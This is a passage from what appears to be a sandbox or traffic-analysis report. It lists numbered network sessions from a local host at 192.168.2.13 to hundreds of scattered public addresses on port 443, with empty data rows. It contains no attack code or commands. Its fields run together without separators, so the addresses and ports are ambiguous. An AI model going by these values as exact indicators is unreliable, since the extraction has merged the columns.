                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11682192.168.2.1357866203.220.63.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11683192.168.2.1342272105.196.11.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11684192.168.2.1351444203.236.91.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11685192.168.2.133648236.231.26.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11686192.168.2.1348356206.220.144.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11687192.168.2.1344538162.148.194.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11688192.168.2.1345178138.114.251.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11689192.168.2.1334736197.244.70.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11690192.168.2.1360458131.122.67.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11691192.168.2.1345762182.238.120.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11692192.168.2.135328217.48.37.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11693192.168.2.1357196182.172.114.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11694192.168.2.1336492183.175.72.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11695192.168.2.1339304171.188.64.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11696192.168.2.1333308102.48.221.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11697192.168.2.1336258144.31.51.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11698192.168.2.135826488.94.143.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11699192.168.2.1343530120.231.116.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11700192.168.2.1348468121.38.1.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11701192.168.2.1349526122.214.250.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11702192.168.2.1360720140.235.184.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11703192.168.2.1334654144.167.192.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11704192.168.2.135380082.70.107.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11705192.168.2.1334194212.157.112.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11706192.168.2.133308498.136.34.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11707192.168.2.135861867.93.201.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11708192.168.2.134020234.88.151.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11709192.168.2.134579036.139.241.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11710192.168.2.13480344.40.171.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11711192.168.2.134171817.86.25.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11712192.168.2.134255054.21.10.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11713192.168.2.1348698172.154.251.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11714192.168.2.1349354216.162.126.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11715192.168.2.135049632.152.245.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11716192.168.2.1359528138.18.138.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11717192.168.2.135202677.244.143.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11718192.168.2.1354028184.149.114.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11719192.168.2.1339374137.110.47.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11720192.168.2.1351436168.5.208.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11721192.168.2.1356610142.82.152.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11722192.168.2.1356484179.112.82.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11723192.168.2.1334370169.87.161.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11724192.168.2.134449665.2.124.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11725192.168.2.1350728185.227.187.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11726192.168.2.1360710189.16.70.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11727192.168.2.135760874.226.45.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11728192.168.2.1358874108.63.252.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11729192.168.2.1334120185.190.66.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11730192.168.2.1351398189.228.16.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11731192.168.2.135381627.38.119.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11732192.168.2.1349132176.198.33.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11733192.168.2.1350102202.79.8.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11734192.168.2.1357756100.35.132.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11735192.168.2.1336658101.44.160.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11736192.168.2.1341612124.228.95.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11737192.168.2.133428086.209.246.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11738192.168.2.134602859.129.234.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11739192.168.2.135315869.93.96.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11740192.168.2.1348788159.93.147.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11741192.168.2.134237496.125.88.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11742192.168.2.133797899.204.243.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11743192.168.2.134550439.9.165.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11744192.168.2.1342376212.239.97.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11745192.168.2.1347684117.10.170.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11746192.168.2.135127078.83.92.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11747192.168.2.1357504101.141.170.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11748192.168.2.1333298153.52.235.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11749192.168.2.1360134139.194.141.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11750192.168.2.135966254.118.37.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11751192.168.2.13503505.233.121.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11752192.168.2.134110482.82.245.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11753192.168.2.1338518118.85.126.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11754192.168.2.134927466.127.43.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11755192.168.2.133868824.0.2.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11756192.168.2.1345866172.170.156.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11757192.168.2.134942467.214.191.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11758192.168.2.135821838.111.246.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11759192.168.2.1350376100.209.221.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11760192.168.2.135408299.108.109.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11761192.168.2.134403472.101.1.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11762192.168.2.1347796203.10.73.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11763192.168.2.1345744114.90.182.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11764192.168.2.1342398108.33.8.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11765192.168.2.1350774105.165.222.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11766192.168.2.135371261.142.93.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11767192.168.2.1353988202.91.172.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11768192.168.2.1334844124.85.120.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11769192.168.2.1341042192.29.54.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11770192.168.2.1356330186.215.87.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11771192.168.2.135997014.69.165.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11772192.168.2.1348652130.74.61.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11773192.168.2.136045077.217.208.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11774192.168.2.1351784171.166.137.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11775192.168.2.133560641.32.47.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11776192.168.2.135259665.60.168.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11777192.168.2.1339850202.213.251.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11778192.168.2.134524081.171.68.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11779192.168.2.135503420.143.193.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11780192.168.2.134374245.141.96.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11781192.168.2.134451892.222.145.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11782192.168.2.13367248.127.43.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11783192.168.2.1351596169.146.43.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11784192.168.2.1352340133.245.238.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11785192.168.2.13464101.175.240.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11786192.168.2.1354586172.114.247.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11787192.168.2.134275099.148.199.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11788192.168.2.134605476.65.84.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11789192.168.2.135044220.61.140.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11790192.168.2.13485369.88.29.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11791192.168.2.133598820.76.124.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11792192.168.2.1340518110.114.98.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11793192.168.2.1334286103.214.19.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11794192.168.2.1359700140.34.113.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11795192.168.2.134434846.25.70.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11796192.168.2.133641266.155.183.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11797192.168.2.1347142209.72.124.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11798192.168.2.13463248.99.124.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11799192.168.2.134991636.67.151.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11800192.168.2.133894673.178.187.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11801192.168.2.1338490118.22.201.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11802192.168.2.1351036216.124.249.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11803192.168.2.13583628.127.172.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11804192.168.2.1355494191.25.114.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11805192.168.2.135492454.146.22.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11806192.168.2.133982466.53.201.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11807192.168.2.1358538146.86.77.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11808192.168.2.1345938185.80.241.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11809192.168.2.13348741.119.53.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11810192.168.2.134637867.43.191.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11811192.168.2.1359442175.244.30.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11812192.168.2.133460683.26.237.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11813192.168.2.1352424135.158.44.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11814192.168.2.134966296.187.187.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11815192.168.2.1355456126.199.216.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11816192.168.2.133375452.40.123.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11817192.168.2.1344708122.155.222.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11818192.168.2.134574283.83.128.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11819192.168.2.1345526182.135.217.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11820192.168.2.133570839.246.45.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11821192.168.2.1346620133.60.243.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11822192.168.2.134904824.117.180.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11823192.168.2.135401232.177.107.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11824192.168.2.1352664179.127.40.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11825192.168.2.135011431.18.201.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11826192.168.2.1336972111.59.196.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11827192.168.2.1335364142.167.195.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11828192.168.2.1339648216.85.122.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11829192.168.2.1339814109.215.153.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11830192.168.2.135125491.206.165.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11831192.168.2.1345248177.120.8.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11832192.168.2.1353336167.176.249.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11833192.168.2.135678464.204.197.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11834192.168.2.135330035.246.6.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11835192.168.2.1350106192.244.97.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11836192.168.2.1360626152.99.192.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11837192.168.2.1334700217.65.118.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11838192.168.2.135042093.86.238.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11839192.168.2.1343518195.240.185.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11840192.168.2.1341918139.72.237.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11841192.168.2.1358586194.7.81.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11842192.168.2.1343556114.216.222.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11843192.168.2.1346758172.195.220.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11844192.168.2.1358176103.173.252.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11845192.168.2.1344886120.185.207.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11846192.168.2.1342476143.231.71.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11847192.168.2.1350444192.254.206.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11848192.168.2.133409625.219.174.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11849192.168.2.1349974202.184.97.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11850192.168.2.1335444147.43.52.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11851192.168.2.134083813.148.143.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11852192.168.2.133816477.50.133.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11853192.168.2.134661231.234.82.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11854192.168.2.133625875.186.139.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11855192.168.2.1359320126.193.31.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11856192.168.2.1342454119.95.164.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11857192.168.2.1336018125.154.23.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11858192.168.2.133288298.243.86.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11859192.168.2.133347269.77.217.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11860192.168.2.13344601.63.201.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11861192.168.2.133578827.134.238.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11862192.168.2.1356874122.135.57.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11863192.168.2.1333176124.249.213.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11864192.168.2.1347706144.102.72.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11865192.168.2.1338466124.11.136.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11866192.168.2.134974634.153.151.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11867192.168.2.1343494169.130.30.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11868192.168.2.135076837.239.103.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11869192.168.2.1335696212.213.14.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11870192.168.2.135336089.136.232.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11871192.168.2.1359004117.62.169.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11872192.168.2.1347930209.194.112.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11873192.168.2.1351854105.46.111.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11874192.168.2.134185881.180.149.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11875192.168.2.1339532161.22.34.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11876192.168.2.1357064211.170.13.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11877192.168.2.1340324132.211.41.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11878192.168.2.1360394132.99.129.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11879192.168.2.1351828129.14.130.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11880192.168.2.1333340141.161.185.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11881192.168.2.13376669.29.210.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11882192.168.2.1358950133.140.153.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11883192.168.2.133546840.20.129.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11884192.168.2.1333980132.121.155.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11885192.168.2.1358176141.46.31.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11886192.168.2.134950447.187.145.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11887192.168.2.133619674.39.216.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11888192.168.2.1345240192.72.248.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11889192.168.2.133770860.87.193.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11890192.168.2.1358624101.218.132.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11891192.168.2.135382427.42.104.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11892192.168.2.1345734159.40.99.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11893192.168.2.1351894145.247.106.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11894192.168.2.134568466.59.164.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11895192.168.2.1336654164.14.95.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11896192.168.2.1359428188.102.57.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11897192.168.2.134850685.2.35.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11898192.168.2.1357492156.210.76.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11899192.168.2.1359182179.17.37.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11900192.168.2.135143866.149.226.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11901192.168.2.135126625.64.233.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11902192.168.2.1357148209.132.38.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
